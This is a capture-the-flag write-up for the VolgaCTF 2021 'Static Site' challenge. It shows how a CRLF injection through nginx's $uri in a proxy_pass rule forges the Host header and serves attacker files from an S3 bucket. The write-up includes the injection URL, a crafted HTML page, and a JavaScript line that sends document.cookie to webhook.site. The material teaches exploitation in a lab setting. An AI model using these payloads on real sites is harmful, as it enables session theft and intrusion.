VolgaCTF 2021 Qualifier - Static Site

[aszx87410]

Static Site

Description

nginx config

server {
    listen 443 ssl;
    resolver 8.8.8.8;
    server_name static-site.volgactf-task.ru;

    ssl_certificate      /etc/letsencrypt/live/volgactf-task.ru/fullchain1.pem;
    ssl_certificate_key  /etc/letsencrypt/live/volgactf-task.ru/privkey1.pem;

    add_header Content-Security-Policy "default-src 'self'; object-src 'none'; frame-src https://www.google.com/recaptcha/; font-src https://fonts.gstatic.com/; style-src 'self' https://fonts.googleapis.com/; script-src 'self' https://www.google.com/recaptcha/api.js https://www.gstatic.com/recaptcha/" always;
   
    location / {
      root /var/www/html;
    }

    location /static/ {
      proxy_pass https://volga-static-site.s3.amazonaws.com$uri;
    }
}

index.html

<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <title>Static Site</title>
    <link rel="stylesheet" href="./static/bootstrap.min.css">
  </head>

  <body class="text-center">
    <div class="cover-container d-flex h-100 p-3 mx-auto flex-column">
      <header class="mt-5">
          <h3 class="masthead-brand">Static Site</h3>
      </header>

      <main role="main" class="mt-5">
        <p class="lead"><img src="./static/hacker.gif"/></p>
        <p class="lead pt-5">
          Ok, hackers, I created a static site with a strict Content-Security-Policy.
        </p>
        <p class="lead">
          It is simply impossible to steal my cookies now!
        </p>
        <p class="lead">
          But, you can still try:
        </p>
        <p>
          <form id="form" class="form-inline justify-content-center" method="POST" action="https://bot-static-site.volgactf-task.ru/">
            <div class="form-group">
              <label for="url">URL</label>
              <input type="url" name="url" id="url" class="form-control mx-sm-3">
              <input type="submit" class="btn btn-secondary g-recaptcha" data-sitekey="6LdN230aAAAAAPsMXHWZ9szidC6tbkSzWDarMqmL" data-callback="onSubmit" data-action="submit">
            </div>
          </form>
        </p>
      </main>
    </div>
    <script src="https://www.google.com/recaptcha/api.js"></script>
    <script src="./static/captcha.js"></script>
  </body>
</html>

Writeup

After review the nginx config and the html file, this part catch my eyes:

location /static/ {
   proxy_pass https://volga-static-site.s3.amazonaws.com$uri;
}

Then I googled nginx $uri vulnerability and found some useful resources:

1. Bottle HTTP 头注入漏洞探究
2. 新浪某站CRLF Injection导致的安全问题
3. Some cases of insecure NGINX configurations

We can use CRLF injection and change the request. I am not familiar with nginx so I create an environment on my local to see how can I use it. After playing for a while I found that I can fake the Host header to read the file in my own bucket:

https://static-site.volgactf-task.ru/static/app.js%20HTTP/1.0%0d%0aHost:%20ctftesthuli.s3.amazonaws.com%0d%0ayo:

So the solution is straightforward:

1. create my own S3 bucket
2. upload /static/index.html
3. upload /static/app.js
4. let bot visits https://static-site.volgactf-task.ru/static/index.html%20HTTP/1.0%0d%0aHost:%20ctftesthuli.s3.amazonaws.com%0d%0ayo:
5. XSS triggered!

html file

<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  </head>

  <body class="text-center">
    
    hello
    <script src="/static/app.js%20HTTP/1.0%0d%0aHost:%20ctftesthuli.s3.amazonaws.com%0d%0ayo:"></script>
  </body>
</html>

js file

window.location = 'https://webhook.site?c='+document.cookie